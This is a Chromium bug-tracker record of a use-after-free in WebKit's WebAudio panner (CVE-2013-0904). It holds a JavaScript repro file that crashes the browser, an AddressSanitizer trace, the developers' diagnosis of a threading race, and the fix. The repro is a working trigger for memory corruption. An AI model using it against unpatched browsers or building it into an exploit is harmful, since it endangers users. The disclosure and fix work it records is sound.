New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.

Issue 172331 link

Starred by 1 user

Issue metadata

Status: Fixed
Owner:
Closed: Feb 2013
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment

Use-after-free in WebCore::VectorMath::vsmul

Reported by attek...@gmail.com, Jan 25 2013

Issue description


Tested on:

OS: Ubuntu 12.04
Chromium: 26.0.1394.0 (Developer Build 178763) 

Repro-file:

<html>
<script>
var context1= new webkitAudioContext()
var BiquadFilter8=context1.createBiquadFilter();
var Oscillator1=context1.createOscillator();
var Panner3=context1.createPanner();

Panner3.connect(BiquadFilter8);
Oscillator1.connect(Panner3);
Panner3.setPosition(119,117,51);
BiquadFilter8.connect(context1.destination);

setInterval(function(){
Panner3.setPosition(358,182,358);
Panner3.panningModel=0;
Panner3.panningModel=1;
},2)

Oscillator1.start(0.8198733804747462,0.8382269653957337,0.03957605152390897)
</script>
</html>

ASAN-report:(The same repro-file causes multiple different ASAN-traces)

==11957== ERROR: AddressSanitizer: heap-use-after-free on address 0x7fa68c0dd040 at pc 0x7fa6aa5ba5f7 bp 0x7fa690f68b50 sp 0x7fa690f68b48
WRITE of size 16 at 0x7fa68c0dd040 thread T6 (AudioOutputDevic)
    #0 0x7fa6aa5ba5f6 in WebCore::VectorMath::vsmul(float const*, int, float const*, float*, int, unsigned long) ???:0
    #1 0x7fa6aa5bdf7b in WebCore::FFTFrame::doInverseFFT(float*) ???:0
    #2 0x7fa6aa7bda8d in WebCore::FFTConvolver::process(WebCore::FFTFrame*, float const*, float*, unsigned long) ???:0
    #3 0x7fa6aa7c552d in WebCore::HRTFPanner::pan(double, double, WebCore::AudioBus const*, WebCore::AudioBus*, unsigned long) ???:0
    #4 0x7fa6a7e58d37 in WebCore::PannerNode::process(unsigned long) ???:0
    #5 0x7fa6a7439d6c in WebCore::AudioNode::processIfNecessary(unsigned long) ???:0
.
.
.
freed by thread T0 (chrome) here:
    #0 0x7f5970aad832 in free ??:0
    #1 0x7f59775b0392 in WebCore::HRTFPanner::~HRTFPanner() ???:0
    #2 0x7f59775b002d in WebCore::HRTFPanner::~HRTFPanner() ???:0
    #3 0x7f5974c46f66 in WebCore::PannerNode::setPanningModel(unsigned int) ???:0
    #4 0x7f5979601820 in WebCore::V8PannerNode::panningModelAccessorSetter(v8::Local<v8::String>, v8::Local<v8::Value>, v8::AccessorInfo const&) ???:0
    #5 0x7f5977d82dff in v8::internal::StoreCallbackProperty(v8::internal::Arguments, v8::internal::Isolate*) ???:0
.
.
.

 
Cc: crogers@google.com scherkus@chromium.org dalecur...@chromium.org
Owner: rtoy@chromium.org
Status: Assigned

Comment 2 by cdn@chromium.org, Jan 31 2013

Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High SecImpacts-Stable SecImpacts-Beta OS-All Mstone-24
filed upstream as https://bugs.webkit.org/show_bug.cgi?id=108527

rtoy@ are you looking at this?

Comment 3 by parisa@chromium.org, Feb 11 2013

Hey Raymond,

I'm following up on all the open high-severity security bugs since Pwnium/Pwn2Own (http://blog.chromium.org/2013/01/show-off-your-security-skills-pwn2own.html) is just around the corner (we're using M25).

Are you on this one? Otherwise we need to find a new owner quick. Thanks for any help!

Comment 4 by rtoy@chromium.org, Feb 11 2013

I am looking into this.  It may take some time to get to the bottom of
this, though.  I think it might be caused by using an object after it has
been freed.  Maybe.

Comment 5 by crogers@google.com, Feb 12 2013

Ray, this looks like a thread safety issue in PannerNode::setPanningModel().  It looks like we need to have a mutex using a MutexTryLocker in PannerNode::process() analogous to how m_processLock is used in AudioBufferSourceNode (when m_buffer is changed)

Comment 6 by rtoy@chromium.org, Feb 12 2013

Yes, that's what I was seeing.  I'll take a look at doing it that way. (I
had made change that saved the new panner in setPanningModel and then
applied that change at the start of PannerNode::process.)

Ray

Comment 7 by crogers@google.com, Feb 13 2013

Status: Fixed
looks like the fix landed in WebKit:
http://trac.webkit.org/changeset/142687

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved reward-topanel
Labels: -Mstone-24 -Merge-Approved Mstone-25 Merge-Merged Release-1
M25: http://trac.webkit.org/changeset/143513
Labels: CVE-2013-0904
Labels: -reward-topanel reward-1000 reward-unpaid
$1000
Project Member

Comment 13 by bugdroid1@chromium.org, Mar 10 2013

Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Mstone-25 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High Type-Bug-Security M-25
Labels: -reward-unpaid reward-inprocess
Project Member

Comment 15 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Severity-High Security_Severity-High
Project Member

Comment 16 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member

Comment 17 by bugdroid1@chromium.org, Mar 21 2013

Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member

Comment 18 by bugdroid1@chromium.org, Apr 5 2013

Labels: -Cr-Content Cr-Blink
Labels: -reward-inprocess
Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Project Member

Comment 21 by sheriffbot@chromium.org, Jun 14 2016

Labels: -security_impact-beta
Project Member

Comment 22 by sheriffbot@chromium.org, Oct 1 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member

Comment 23 by sheriffbot@chromium.org, Oct 2 2016

This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Labels: CVE_description-submitted

Sign in to add a comment